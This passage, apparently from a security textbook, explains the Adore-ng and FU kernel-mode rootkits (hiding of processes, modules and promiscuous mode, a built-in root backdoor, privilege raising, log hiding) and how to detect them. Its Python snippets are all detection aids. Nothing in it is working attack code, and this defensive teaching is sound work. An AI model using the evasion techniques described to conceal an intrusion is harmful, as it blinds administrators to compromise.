Adore-ng is a kernel-mode rootkit that targets Linux systems running kernel 2.4, 2.5, and 2.6. The tool has also been ported to FreeBSD. Adore-ng has a variety of standard kernel-mode rootkit capabilities, including execution redirection, file hiding, process hiding, and network hiding. Additionally, it includes numerous nifty features, such as these:

  • Promiscuous mode hiding. As we discussed in Chapter 8, attackers often run a sniffer on their victim machines to gather sensitive information sent between other systems across the network. The attacker can hide the running sniffer program itself easily using file and process hiding. However, sniffers typically put the Ethernet interface in promiscuous mode to gather all packets from the LAN, which the administrator can detect using the ip link commands on some versions of Linux and ifconfig on some versions of UNIX. Adore-ng alters the kernel so that it lies about promiscuous mode, helping to make the sniffer even stealthier. Interestingly, this promiscuous-mode hiding feature is intelligent, in that the evil kernel analyzes whether an administrator or an attacker ran a sniffer to place the interface in promiscuous mode. Think about it. If the evil kernel always lied about promiscuous mode, saying that it never exists, a suspicious administrator could catch the kernel in a lie and detect the attackers’ presence. On Linux, the admin could simply run ip link and see if the interface is in promiscuous mode. If not, the administrator can then run a sniffer (such as tcpdump), forcing the interface into promiscuous mode. Now, when the admin runs ip link or ifconfig to check for promiscuous mode, we have a chance to catch the kernel in a lie! If the system does not show promiscuous mode, we know it is lying, because the admin just forced it into that mode. Older kernel-mode rootkits did not intelligently hide promiscuous mode. The newer ones, like Adore-ng, are smarter, and check to see if the sniffer is run by an admin or the attacker. If an admin fires up the sniffer, the system displays promiscuous mode like normal. But if an attacker runs a sniffer, the kernel will lie about its promiscuous effects.
  • Process hiding. Adore-ng can take any running process and cloak it. At the request of the attacker, the kernel suppresses all information about the given process. While the process continues to run, all use of the ps, lsof, or other process viewing commands will not show the process. This feature reminds me of the Romulans in the Star Trek sci-fi series. When the Romulans are getting ready to attack, they activate their ship’s cloaking device. All traces of their spaceship eerily disappear, while the ship continues to attack. However, if you remember your Star Trek lore, the Romulans cannot use their photon torpedoes while cloaked. Adore-ng does not have any such limitation.
  • Kernel-module hiding. On Linux, the lsmod command provides a list of kernel modules currently installed on a machine. The attacker does not want the system administrator to see the Adore-ng module loaded into the system’s kernel. The Adore-ng tool therefore hides itself from lsmod, tweaking the kernel to lie about the kernel’s own status.
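As a side note on the promiscuous-mode check described in the first bullet: on a modern Linux box, an administrator can read the interface flags directly from sysfs rather than eyeballing ip link output. The sketch below assumes a Linux system with sysfs mounted, and of course a rootkitted kernel could lie through this interface just as it lies to ip link and ifconfig.

```python
# Sketch: check whether a network interface is in promiscuous mode by
# reading its flags from Linux sysfs. IFF_PROMISC is the 0x100 bit.
# A compromised kernel can falsify this value just like ip link output.
def is_promiscuous(iface):
    with open(f"/sys/class/net/{iface}/flags") as f:
        return bool(int(f.read().strip(), 16) & 0x100)
```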

Adore-ng also includes a built-in backdoor that lets an attacker connect to the system across the network and gain a root-level command shell prompt. This is pretty straightforward stuff, as we’ve seen Netcat do the very same thing. The nice innovation of Adore-ng is including the capability in a kernel module itself, so the attacker doesn’t have to mess around with installing and configuring a separate backdoor tool. Everything is included in one nice package: the hiding prowess of the kernel-mode rootkit, along with a nice backdoor shell listener. This approach is very difficult to detect, because no indications of files, processes, or listening network ports are available to the system administrator.

The Windows FU Kernel-Mode Rootkit

Kernel-mode rootkits aren’t limited to the Linux and UNIX world. For Windows, a very powerful kernel-mode rootkit is called FU. Its author, a researcher named Fuzen, points out that his rootkit’s name is a take-off on the UNIX command su for substituting users. Thus, its name is to be pronounced “eff-yoo” instead of “foo,” a distinction I think he makes because he enjoys hearing people say “FU.” Anyway, this very full-featured rootkit directly manipulates Windows kernel memory on Windows 2000, XP, and 2003 machines. The tool consists of a special device driver, named msdirectx.sys, which some users might mistake for Microsoft’s own DirectX tool, an environment for developing graphics, sound, music, and animation programs such as games.

As is common for kernel-mode rootkits, FU can hide an attacker’s processes on the machine. Additionally, FU can alter the privileges of any running process to any level the attacker wants, on the fly without even stopping the process. You might have a program running with really limited privileges, just plodding along doing some work. FU comes along, at the direction of the attacker, and instantly gooses this process up to SYSTEM privileges, so the attacker can utilize the process for some nefarious goal. The process is happy with its newfound privileges, until the attacker abuses it, possibly altering the system to edit logs, install a backdoor, or change user account settings.

Furthermore, FU hides selected types of events from the Windows Event Viewer, so an administrator will not be able to see specific actions taken by the attacker when running the Event Viewer locally on the machine. The attacker might want to hide events associated with the bad guy’s own logon and source IP address. Of course, if event logs are forwarded to a separate, nonrootkitted machine, the administrator will be able to view them properly there. That’s why heavily secured, separate logging servers are such a good idea for defenders to know what is really happening on their machines. Finally, FU can even hide device drivers, including itself, so an administrator cannot see them installed on the system.

Defending Against Kernel-Mode Rootkits

Fighting Fire with Fire: Don’t Do It!

I frequently get asked whether someone should install a kernel-mode rootkit on their own systems on a proactive basis before an attacker does. The idea is that if I install Adore-ng on my own machine, then an attacker won’t be able to do it after me, and I’ll have the upper hand. I very much disagree with this philosophy. If you try to fight fire with fire, you very well could burn down your house!

This is a bad idea for several reasons. First, without a detailed understanding of the particular kernel-mode rootkit you install, you might make your system more vulnerable to a highly skilled attacker who understands the tool better than you do. Furthermore, a kernel-mode rootkit makes the system inherently more difficult to understand and analyze. If your machine is compromised, the postmortem forensics analysis gets significantly trickier with a kernel-mode rootkit in place. You might have to remap every executable, file, process, or network request to determine what has really happened on your system. This more complex analysis would be unwelcome news in a sensitive investigation. Finally, theoretically, multiple kernel-mode rootkits of different types could be installed on a system at the same time, possibly without interacting with each other in a negative way. Therefore, just because you have installed Adore-ng, nothing prevents the attacker from taking over the system and installing a home-grown kernel-mode rootkit right on top of it. So, your installation of Adore-ng isn’t necessarily locking out other rootkits.

Sure, you can play with kernel-mode rootkits in your protected lab to learn more about them. However, I strongly recommend that you do not install a kernel-mode rootkit on your own production systems.

Don’t Let Them Get Root in the First Place!

A recurring theme in this book is preventing attackers from gaining super-user access on your machines in the first place. Although it might sound repetitive, I can’t overstress it: You must configure your systems securely, disabling all unneeded services and applying all relevant security patches. Without super-user access, an attacker cannot install a kernel-mode rootkit (or a user-mode rootkit, for that matter). Hardening your systems and keeping them patched are the best preventative means for dealing with kernel-mode rootkits.

Control Access to Your Kernel

You also might want to turn to some freely available tools to help limit attackers’ actions on your systems. One noteworthy free tool for identifying and controlling the flow of action between user mode and kernel mode on Linux and UNIX is Systrace by Niels Provos, available at www.citi.umich.edu/u/provos/systrace. Don’t get confused by the name Systrace. Another tool, called strace, merely shows the system calls made by an application into the kernel. Systrace goes far beyond simple strace. Once installed on Linux, FreeBSD, and Mac OS X machines, Systrace tracks and limits the system calls that individual applications can make.

Cisco’s Security Agent (called CSA for short) and McAfee’s Entercept products perform similar duties on a commercial basis. CSA runs on Windows and Solaris, whereas McAfee’s Entercept is available for Windows, Solaris, and HP-UX. In fact, these so-called host-based IPSs offer a variety of protection strategies, such as system configuration hardening. However, one of the most worthwhile capabilities of Systrace, CSA, and Entercept involves limiting the calls that various applications can make into the kernel on the machine. By configuring the host-based IPS to limit which system calls a given program (such as a Web server, mail reader, or database application) can make, the bad guys will have a far more difficult time compromising administrator privileges and installing rootkits. It’s just harder for the bad guys to invade the kernel when they are trapped in the straitjacket of a good host-based IPS. In effect, Systrace, CSA, and Entercept wrap the kernel in a protective layer of software to block unusual activity.

Although such tools are very useful in hardening a kernel against attack, do not underestimate the time necessary to train these tools about what is “normal” for your given machine. The tools must first characterize normal access of the kernel for a given application mix on a box. Then, they stop all abnormal access. However, this training for normal activity can take weeks, and must be done on a trusted system not compromised by an attacker. If you train a tool on a compromised machine, you’ll have a tool that is imprinted on abnormal behavior, a very sad and dangerous thing.

Looking for Traces of Kernel-Mode Rootkits by Hand

To detect the presence of kernel-mode rootkits, some people suggest tickling various features of the rootkits to see if they are present on a machine. By looking for the telltale features of particular kernel-mode rootkits, you might detect their installation. For example, as we discussed earlier, you could activate a sniffer and check whether promiscuous mode is suppressed. If the sniffer is running but promiscuous mode is not shown, you have identified some kernel-mode rootkits. Unfortunately, this technique misses many rootkits, including Adore-ng.

Although these techniques certainly work for some kernel-mode rootkits, there is simply too much rootkit variety for manual checks to catch a large number of attacks. Furthermore, a significant amount of manual intervention is involved in searching for these kernel-mode rootkit features on a one-by-one basis. Therefore, although such checks might be a good idea if you suspect a kernel-mode rootkit is already installed, how do you get suspicious in the first place? When do you know to investigate further?

Automated Rootkit Checkers

By automatically looking for the system anomalies that kernel-mode rootkits introduce, automated rootkit checkers are incredibly useful in investigations. For you fans of The Matrix movies, these tools are really looking for glitches in the Matrix. As you might recall, glitches in the Matrix occur when the bad guys start changing things, creating a sense of déjà vu. Similarly, with a kernel-mode rootkit, an inconsistency in the system’s appearance could be an indication that something foul has been installed. Automated rootkit checkers perform various tests that can catch the kernel in a lie about the existence of certain files and directories, network interface promiscuous mode, and other issues that kernel-mode rootkits generally fib about.

In particular, the free Chkrootkit tool at www.chkrootkit.org can detect more than 50 kernel-mode and user-mode rootkits running on Linux, FreeBSD, OpenBSD, NetBSD, Solaris, HP-UX, and Tru64. Chkrootkit first scans various system executables, looking for the fingerprints of very popular user-mode rootkits. Next, it searches for hidden processes by comparing the contents of the /proc directory with the results returned by the ps command. The directory /proc stores information about each running process on the system. If the ps command does not show all processes indicated by /proc, some of the processes are being hidden. This technique will turn up most user-mode rootkits, and some kernel-mode rootkits. Unfortunately, a sophisticated kernel-mode rootkit will modify what Chkrootkit can see in /proc, making the attacker too stealthy to be detected by this technique.
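To make the hidden-process technique concrete, here is a minimal sketch of the /proc-versus-ps comparison in Python. It assumes a Linux system with the ps command available; the function names are my own for illustration, not Chkrootkit’s.

```python
import os
import subprocess

def pids_from_proc():
    """List PIDs by reading the numeric entries in /proc directly."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}

def pids_from_ps():
    """List PIDs as reported by the ps command."""
    out = subprocess.run(["ps", "-e", "-o", "pid="],
                         capture_output=True, text=True, check=True)
    return {int(token) for token in out.stdout.split()}

def hidden_pids():
    """Return PIDs visible in /proc but missing from ps output.

    Processes that exit between the two snapshots cause harmless,
    transient false positives, so rerun before drawing conclusions.
    """
    return pids_from_proc() - pids_from_ps()
```

On a clean system, repeated runs should return an empty set; a PID that persistently shows up in /proc but never in ps output deserves a much closer look. Of course, a kernel-mode rootkit that filters /proc itself will evade this check entirely.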

Another way that Chkrootkit finds kernel-mode rootkits is by looking for inconsistencies in the directory structure when a file or directory is hidden. Each directory in the file system has a link count, which indicates the number of other directories that a given directory is connected to in the file system structure. For each directory, this link count should be two more than the number of subdirectories in the directory. That way, the directory would have one link for each subdirectory, plus one for the parent directory (..) and one for itself (.). Many kernel-mode rootkits hide files and directories without manipulating the link count of the parent directory. Chkrootkit combs through the entire directory structure, counting the number of subdirectories that it can see inside each directory and comparing it to the link count. If it finds a discrepancy, Chkrootkit prints a message indicating that there might very well be directories that are hidden by a kernel-mode rootkit.
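Here is a rough Python sketch of the link-count test described above. It assumes a traditional UNIX filesystem, where a directory’s link count equals two plus its number of subdirectories; some filesystems (btrfs and some overlay filesystems, for instance) don’t maintain this convention, so treat any flagged directory as a hint to investigate, not proof of a rootkit.

```python
import os

def link_count_mismatches(root):
    """Flag directories whose hard-link count disagrees with the
    number of subdirectories visible to user programs.

    On traditional UNIX filesystems, a directory's link count is
    2 + (number of subdirectories): one link for its own '.', one
    for its name in the parent, and one for each child's '..'.
    A shortfall in visible subdirectories can mean something is
    being hidden from user-mode programs.
    """
    mismatches = []
    for dirpath, dirnames, _filenames in os.walk(root):
        # Symlinks to directories don't contribute '..' links.
        visible = sum(1 for d in dirnames
                      if not os.path.islink(os.path.join(dirpath, d)))
        nlink = os.stat(dirpath).st_nlink
        if nlink != visible + 2:
            mismatches.append((dirpath, nlink, visible + 2))
    return mismatches
```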

Rootkit Hunter, available for free at www.rootkit.nl/projects/rootkit_hunter.html, is a tool similar to Chkrootkit, but it runs on Linux, FreeBSD, OpenBSD, Solaris, and AIX. I use Rootkit Hunter to get a second opinion on potentially compromised UNIX or Linux machines, augmenting the results of my Chkrootkit scan.

Whereas Chkrootkit and Rootkit Hunter focus on Linux and UNIX systems, similar tools exist for Windows, namely Rootkit Revealer by Mark Russinovich at www.sysinternals.com and Blacklight by the antivirus vendor F-Secure at www.f-secure.com/blacklight. Both tools are available for free and do a fantastic job of detecting Windows rootkits, both the user-mode and kernel-mode variants. To accomplish this, these tools run in both user mode and in kernel mode, looking for discrepancies between what is visible in user mode and what is viewable inside the kernel regarding the file system and registry. For example, suppose a user-mode or kernel-mode rootkit hides some files from view. The user-mode component of these Windows rootkit checkers will therefore not be able to see these hidden files. However, the kernel-mode component of the rootkit checker will see the files, and flag the discrepancy for an administrator. Bingo! We’ve detected the rootkit.

However, it is important to note that you might get a false positive notification from any of these automated rootkit checking tools, whether for Linux/UNIX or Windows. Some completely benign programs do introduce the anomalies that these tools look for, particularly security tools running in a Windows environment. Some legitimate personal firewall tools and antivirus programs try to hide files and processes from users and malicious code by altering the system using the same techniques as user-mode and kernel-mode rootkits. These rootkit detectors discover these hiding tactics and warn their users of a potential rootkit infestation. So, in effect, we’ve got security software (the automated rootkit checkers) detecting the techniques used by other security software (personal firewalls and antivirus tools) while it tries to hide from malicious software (worms, bots, and even rootkits). Making matters even more interesting, some antivirus tools alert while a rootkit checker like Rootkit Revealer or Blacklight executes, because they notice the calls made into the kernel by these tools, which would be suspicious under other circumstances.

File Integrity Checkers Still Help!

Although they can be tricked by very thorough kernel-mode rootkits, you should still use file integrity checking tools, such as Tripwire, AIDE, and related programs. As we’ve discussed, a thorough bad guy will configure the manipulated kernel with execution redirection and other alterations that lie to a file integrity checker about all file changes on the system. If the attackers very carefully cover all of their tracks, they can fool a file integrity checker. In other words, a perfectly implemented and perfectly deployed kernel-mode rootkit can trick a file integrity checker into thinking that everything is okay on a system.

However, a less careful attacker might forget to configure the kernel-mode rootkit to hide alterations to one or two sensitive system files. Even a single mistake in the file-hiding configuration of the kernel-mode rootkit by the bad guys could expose them to detection by your file integrity checker. Alternatively, if the bad guy’s rootkit code is flawed in a subtle way, the file integrity checking tool might still have a chance of detecting the changes. Therefore, don’t throw out the baby with the bathwater! File integrity checking tools remain very valuable, even though a kernel-mode rootkit can foil them if the attacker is very careful. I’d rather not depend solely on the attackers making mistakes to discover their treachery, but you had better believe I’ll be sure to take thorough advantage of their errors. Deploying file integrity checking tools on all of my sensitive systems lets me prepare for such circumstances.
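To illustrate the basic idea behind tools like Tripwire and AIDE, here is a bare-bones integrity-checking sketch in Python. It is a toy, not a substitute for the real tools: a production checker also records permissions, owners, and inode data, cryptographically signs its baseline, and stores it offline so an attacker cannot rewrite it.

```python
import hashlib
import os

def sha256_file(path):
    """Return the SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(paths):
    """Build a baseline of cryptographic hashes for the given files."""
    return {p: sha256_file(p) for p in paths if os.path.isfile(p)}

def compare(baseline, current):
    """Report files whose hashes changed, vanished, or appeared."""
    changed = [p for p in baseline
               if p in current and baseline[p] != current[p]]
    missing = [p for p in baseline if p not in current]
    added = [p for p in current if p not in baseline]
    return changed, missing, added
```

Keep in mind the caveat above: a carefully configured kernel-mode rootkit with execution redirection can feed pristine file contents to these reads, but a sloppy attacker who misses even one monitored file will show up in the comparison.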

Antivirus Tools Help Too!

Most antivirus solutions have signatures for dozens of different rootkits, both of the user-mode and kernel-mode varieties. When they detect a file from a rootkit, most antivirus tools prevent the program from being accessed. Therefore, the rootkit cannot be installed on the system in the first place. Antivirus tools thus offer preventative controls for thwarting many rootkits. By using them, you’ll raise the bar against casual attackers: the bad guy will have to be smart enough to disable the antivirus tool, dodge it, or modify its signature base before installing the rootkit. Sure, the more skilled attackers will jump over that bar, but we’ve still got a chance at discovering them when they get sloppy or lazy.
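The signature-matching approach can be sketched in a few lines of Python. The byte patterns below are invented purely for illustration; real antivirus engines ship databases of thousands of carefully chosen signatures and match far more cleverly than a plain substring search.

```python
import os

# Hypothetical byte signatures, for illustration only. A real
# engine uses vendor-maintained signature databases.
SIGNATURES = {
    b"adore-ng": "Adore-ng kernel-mode rootkit (example signature)",
    b"FU rootkit": "FU Windows rootkit (example signature)",
}

def scan_file(path):
    """Return the names of any signatures found in a single file."""
    try:
        with open(path, "rb") as f:
            data = f.read()
    except OSError:
        return []
    return [name for sig, name in SIGNATURES.items() if sig in data]

def scan_tree(root):
    """Walk a directory tree and report files matching a signature."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            matches = scan_file(path)
            if matches:
                hits[path] = matches
    return hits
```

The weakness is exactly the one noted above: an attacker who repacks or tweaks the rootkit binary changes its bytes, and a static signature no longer matches.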

Trusted CDs for Incident Handling and Investigations

When investigating potential rootkit attacks, remember that the operating system software itself might lie to you about what’s happening on the machine. If you can’t trust the existing system executables, running processes, or even the kernel, what can you do to determine the true status of the system? First, get a solid backup of the machine before even considering shutting it down. That’ll give you some good evidence for your analysis. Shutting down a system gracefully will change hundreds of files, so get your backup first if you ever intend to perform forensics analysis.

Next, get a copy of a trusted CD designed for incident handling and forensics analysis. Two of my favorite tools in this category are Helix, free at www.e-fense.com/helix, and Knoppix-STD, free at www.knoppix-std.org. Both tools are bootable Linux environments, rendered in a CD image format. Download these CD image files and burn them to a CD. Then, investigators can insert the Helix or Knoppix-STD CD in a potentially compromised machine, and boot from the CD. As the system shuts down, the potentially evil, deceiving kernel and executables will stop running. When the system reboots, the trusted kernel from Helix or Knoppix will be loaded into memory. Because this new kernel is grabbed from the CD, an investigator can use it to read the victim machine’s file system with more trustworthy results than one can get from an evil kernel. Therefore, after booting from the CD, the investigator can run a file integrity checker (built into the CD, of course) to look for changes.

“But, how can I use a bootable Linux CD like Helix or Knoppix-STD to analyze my Windows system?” you might ask. Well, although Helix and Knoppix-STD are bootable Linux images, they include a variety of tools for mounting and analyzing Windows disk partitions. If you don’t want to work in Linux, Helix even includes Windows executables that mimic the functions of such tools as the dir command, the File Explorer, the netstat command, and the Windows command shell. Of course, if you use the executables from the Helix CD on a machine with a running rootkitted kernel, that kernel will still lie to your Helix tools. But, by booting the Helix Linux image, the evil kernel won’t be around anymore, and you can conduct more thorough analysis from within Linux. Thus, Helix and Knoppix-STD can be used in most environments with Windows, Linux, and even other UNIX operating systems.

Conclusion

In this chapter, we have seen a variety of techniques that attackers use to maintain access on a system. They often add software or manipulate the functionality of the operating system itself to lurk on the machine. The tools used for such techniques are getting much more sophisticated, targeting the most fundamental levels of our operating systems. A large number of rootkits, and kernel-mode rootkits in particular, are in active development, with new and powerful features being frequently added.

While altering a system to maintain access, attackers often employ a variety of techniques to cover their tracks. In the next chapter, we explore many of these tactics for hiding on a system.

Summary

After gaining access to a target machine, attackers want to maintain that access. They use Trojan horses, backdoors, and rootkits to achieve this goal. A Trojan horse is a program that looks like it has some useful purpose, but really hides malicious functionality. Backdoors give an attacker access to a machine while bypassing normal security controls.

Backdoors and Trojan horses are the most damaging when they are melded together. The resulting Trojan horse backdoors can operate at a variety of levels. Application-level Trojan horse backdoors involve running a separate application on the target machine that looks innocuous, but gives the attacker access to and control of the victim machine. Remote-control programs, bots, and spyware are three of the most popular categories of application-level Trojan horse backdoor. These tools can be used to access any file on the victim’s machine, watch the user’s actions in the GUI, and log keystrokes, among numerous other features. The best defense against application-level Trojan horse backdoors is to utilize up-to-date antivirus and antispyware tools and avoid malicious software.

User-mode rootkits go to a deeper level of the operating system than application-level Trojan horse backdoors. User-mode rootkits replace critical system executable programs, such as the login and sshd programs in UNIX and Linux. Attackers replace them with another version that includes a backdoor password. Additionally, attackers rely on user-mode rootkits to replace many other programs, such as ifconfig, ls, ps, and du, all of which act as the eyes and ears of a system administrator. By altering these programs, the attackers can mask their presence on the system. Alternatively, on a Windows machine, the bad guys use debug privileges to inject code into running processes to hook their API calls. That way, when programs such as Task Manager or netstat attempt to determine the status of the system, the attacker can hide certain critical information, such as specific processes, files, and TCP ports. To defend against user-mode rootkits, you should employ file system integrity checking tools, such as Tripwire, on sensitive systems. These tools calculate cryptographic hashes of key system files, and can detect changes caused by rootkits.

Kernel-mode rootkits are the nastiest Trojan horse backdoors we face on a regular basis today. Using these tools, the attacker alters the kernel of the target operating system to provide backdoor access and hide on the system. Most kernel-mode rootkits provide execution redirection to remap a user’s request to run a program so that a program of the attacker’s choosing is executed. Kernel-mode rootkits also support hiding files, directories, TCP and UDP port usage, and running processes.

To defend against kernel-mode rootkits, you should keep attackers from gaining super-user access in the first place by applying system patches and host-based IPSs. Tools such as Chkrootkit and Rootkit Hunter for Linux and UNIX, as well as Rootkit Revealer and Blacklight for Windows, look for anomalies introduced on a system by various user-mode and kernel-mode rootkits. Furthermore, antivirus tools can help prevent many of the most popular kernel-mode rootkits from being installed in the first place. And, although a perfectly implemented and perfectly deployed kernel-mode rootkit can dodge a file integrity checker, these tools are more important now than ever, because they can find very subtle mistakes made by an attacker that a human might miss. Finally, bootable Linux CDs such as Helix and Knoppix-STD provide a useful tool chest of incident response and forensics tools, with output that you can trust more than the lies told by user-mode and kernel-mode rootkits.
